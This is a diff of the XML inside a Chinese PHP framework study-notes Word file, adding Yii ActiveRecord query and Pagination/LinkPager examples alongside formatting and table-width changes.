+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+            <w:r>
+              <w:t>数据库</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>获取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> country </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>表的所有行并以</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>排序</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$countries = Country::find()-&gt;orderBy('name')</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>-&gt;all();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>获取主键为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>“</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>US</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>的行</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$co</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>untry = Country::findOne('US');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>输出</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>“</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>United States</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>echo $country-&gt;name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>修改</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>“</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>U.S.A.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>并在数据库中保存更改</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$country-&gt;name = 'U.S.A.';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$country-&gt;save();</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Yii</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>自带分页插件：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>yii\data\</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Pagination</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）分页类初始化</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$pagination = new Pagination([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>'defaultPageSize' =&gt; 5,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>每页记录数</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>'totalCount' =&gt; $query-&gt;count(),</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>总记录数</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>根据</w:t>
+            </w:r>
+            <w:r>
+              <w:t>分页类提供的</w:t>
+            </w:r>
+            <w:r>
+              <w:t>offset</w:t>
+            </w:r>
+            <w:r>
+              <w:t>和</w:t>
+            </w:r>
+            <w:r>
+              <w:t>limit</w:t>
+            </w:r>
+            <w:r>
+              <w:t>查询数据库获取数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$countries </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Country::find()</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>-&gt;orderBy('name')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>-&gt;offset($pagination-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>offset</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>-&gt;limit($pagination-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>limit</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>-&gt;all();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>渲染</w:t>
+            </w:r>
+            <w:r>
+              <w:t>模板时传递</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>数据</w:t>
+            </w:r>
+            <w:r>
+              <w:t>和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>分页类</w:t>
+            </w:r>
+            <w:r>
+              <w:t>实例（用于分页选择链接）</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $this-&gt;render('country', [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>'countries' =&gt; $countries,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>'pagination' =&gt; $pagination,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>类实例</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）视图中显示数据，并通过插件显示分页选择链接</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>use yii\widgets\LinkPager;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>LinkPager</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>::widget([</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'pagination' =&gt; $pagination])</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>效果</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="2"/>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67880474" wp14:editId="4F7A673F">
+                  <wp:extent cx="1323975" cy="361950"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="24" name="图片 24"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId29"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1323975" cy="361950"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
     <w:p/>
     <w:p/>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -6298,8 +6298,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9659"/>
-        <w:gridCol w:w="9660"/>
+        <w:gridCol w:w="5449"/>
+        <w:gridCol w:w="2847"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -6691,8 +6691,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="6422"/>
-        <w:gridCol w:w="6456"/>
+        <w:gridCol w:w="6437"/>
+        <w:gridCol w:w="6441"/>
         <w:gridCol w:w="6441"/>
       </w:tblGrid>
       <w:tr>
@@ -9270,9 +9270,9 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="6441"/>
-        <w:gridCol w:w="6441"/>
-        <w:gridCol w:w="6437"/>
+        <w:gridCol w:w="3189"/>
+        <w:gridCol w:w="2639"/>
+        <w:gridCol w:w="2468"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -10154,9 +10154,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10349,7 +10346,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
             </w:pPr>
@@ -10530,7 +10526,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10570,7 +10565,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10600,7 +10594,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10645,7 +10638,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10918,24 +10910,13 @@
               <w:t>表单名称一致，数据会自动填充：</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="6440" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10977,7 +10958,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11042,7 +11022,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11192,13 +11171,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>];}</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t>];}}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11280,7 +11253,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -11407,11 +11379,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -11423,13 +11390,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t>}}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11605,11 +11566,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
